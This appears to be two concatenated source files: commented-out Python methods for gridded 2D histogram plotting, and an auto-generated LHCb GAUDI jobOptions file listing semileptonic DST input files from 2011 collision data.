# logx=self.log.x,
# logy=self.log.y,
# clip_data=False,
# nbins=self.nbins,
# )
# h2d.set_axnorm(self.axnorm)
# xlbl, ylbl, zlbl = self.labels.x, self.labels.y, self.labels.z
# h2d.set_labels(x=xlbl, y=ylbl, z=zlbl)
# return h2d
# def make_h2ds(self):
# grouped = self.grouped
# # Build case that doesn't include subgroups.
# x = self.data.loc[:, "x"]
# y = self.data.loc[:, "y"]
# try:
# z = self.data.loc[:, "z"]
# except KeyError:
# z = None
# hall = self._build_one_hist2d(x, y, z)
# h2ds = {"All": hall}
# for k, g in grouped:
# x = g.loc[:, "x"]
# y = g.loc[:, "y"]
# try:
# z = g.loc[:, "z"]
# except KeyError:
# z = None
# h2ds[k] = self._build_one_hist2d(x, y, z)
# h2ds = pd.Series(h2ds)
# self._h2ds = h2ds
# return h2ds
# @staticmethod
# def _make_axis_text_label(key):
# r"""Format the `key` identifying the Categorial group for this axis. To modify,
# sublcass `GridHist2D` and redefine this staticmethod.
# """
# return key
# def _format_axes(self):
# axes = self.axes
# for k, ax in axes.items():
# lbl = self._make_axis_text_label(k)
# ax.text(
# 0.025,
# 0.95,
# lbl,
# transform=ax.transAxes,
# va="top",
# fontdict={"color": "k"},
# bbox={"color": "wheat"},
# )
# # ax.set_xlim(-1, 1)
# # ax.set_ylim(-1, 1)
# def make_plots(self, **kwargs):
# h2ds = self.hist2ds
# axes = self.axes
# cbars = {}
# cnorms = self.cnorms
# for k, h2d in h2ds.items():
# if isinstance(cnorms, mpl.colors.Normalize) or cnorms is None:
# cnorm = cnorms
# else:
# cnorm = cnorms.loc[k]
# ax = axes.loc[k]
# ax, cbar = h2d.make_plot(ax=ax, norm=cnorm, **kwargs)
# if not self.use_gs:
# cbars[k] = cbar
# else:
# raise NotImplementedError(
# "Unsure how to handle `use_gs == True` for color bars."
# )
# cbars = pd.Series(cbars)
# self._format_axes()
# self._cbars = cbars
|
python
|
#-- GAUDI jobOptions generated on Mon Oct 12 10:07:37 2020
#-- Contains event types :
#-- 90000000 - 3737 files - 56787251 events - 2862.54 GBytes
#-- Extra information about the data processing phases:
#-- Processing Pass: '/Real Data/Reco14/Stripping21r1'
#-- StepId : 127013
#-- StepName : Stripping21r1-Merging-DV-v36r1
#-- ApplicationName : DaVinci
#-- ApplicationVersion : v36r1
#-- OptionFiles : $APPCONFIGOPTS/Merging/DV-Stripping-Merging.py
#-- DDDB : dddb-20130929
#-- CONDDB : cond-20141107
#-- ExtraPackages : AppConfig.v3r203;Det/SQLDDDB.v7r10
#-- Visible : N
from Gaudi.Configuration import *
from GaudiConf import IOHelper
IOHelper('ROOT').inputFiles([
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044696_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046559_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062717_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061974_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052008_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058118_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036336_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006868_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035830_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066425_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037536_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047804_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018011_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059937_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017797_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063290_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027612_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030702_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042868_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041996_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053629_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031308_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003989_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048934_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001834_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009151_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004636_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003016_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061106_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015116_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061809_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010001_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062020_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036167_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051184_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024719_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067774_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062653_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015456_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030650_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043192_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012121_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053002_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011871_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016694_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012979_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005443_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032341_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021210_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062585_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060617_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034909_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006962_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053479_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059726_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038635_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040210_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037667_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010698_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057078_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047780_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006524_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009523_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052920_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000372_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069510_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034169_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006433_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042570_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060648_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050899_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020814_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011349_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046478_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028830_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059906_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043506_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069095_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041540_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022839_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030145_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061813_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040484_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004061_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046058_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015987_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001681_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053873_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026170_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047586_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065929_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021866_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004716_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057952_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032889_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001347_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016554_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017515_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026703_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005542_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064045_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041461_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004909_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057820_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009834_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031887_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038766_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029719_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015016_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038508_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060162_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041998_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003700_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025679_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020664_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023033_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068086_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050702_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001520_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052940_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041520_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064230_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049654_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061881_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030516_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063366_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010056_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030390_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050481_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027070_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052079_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068235_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047734_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055316_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062532_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004687_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064452_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035671_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006105_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003351_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018977_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057633_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034242_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005098_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065228_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066162_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028141_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045380_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027181_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068857_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040753_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054720_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015769_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032450_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039563_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051648_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048897_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027846_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030161_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011348_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052809_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018046_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049899_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062183_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016557_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051461_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052399_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051958_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000474_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054740_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010910_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061550_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005630_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065927_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049844_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002874_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039730_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065805_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015842_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061722_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001865_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053627_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060203_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024539_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053807_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025046_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052315_1.semileptonic.dst',
